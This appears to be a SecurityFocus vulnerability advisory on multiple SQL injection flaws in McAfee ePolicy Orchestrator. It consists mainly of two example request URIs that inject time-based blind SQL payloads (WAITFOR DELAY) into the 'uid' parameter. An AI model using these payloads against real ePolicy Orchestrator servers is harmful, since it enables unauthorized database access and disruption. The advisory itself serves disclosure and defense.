McAfee ePolicy Orchestrator Multiple SQL Injection Vulnerabilities

An attacker can exploit this issue using a web browser.

The following example URIs are available:

http://www.example.com/core/showRegisteredTypeDetails.do?registeredTypeID=epo.rt.computer&uid= 6waitf or%20delay'0%3a0%3a20'-- &index=0&datasourceID=&orion.user.security.token=2LoWTAOfWJ4ZCjxY&ajax Mode=standard HTTP/1.1

http://www.example.com/EPOAGENTMETA/DisplayMSAPropsDetail.do?registeredTypeID=epo.rt.computer &uid=1;%20WAITFOR%20DELAY%20'0:0:0';-- &datasourceID=ListDataSource.orion.dashboard.chart.datasource.core.query Factory %3Aquery.2&index=0 HTTP/1.1


 

Privacy Statement
Copyright 2010, SecurityFocus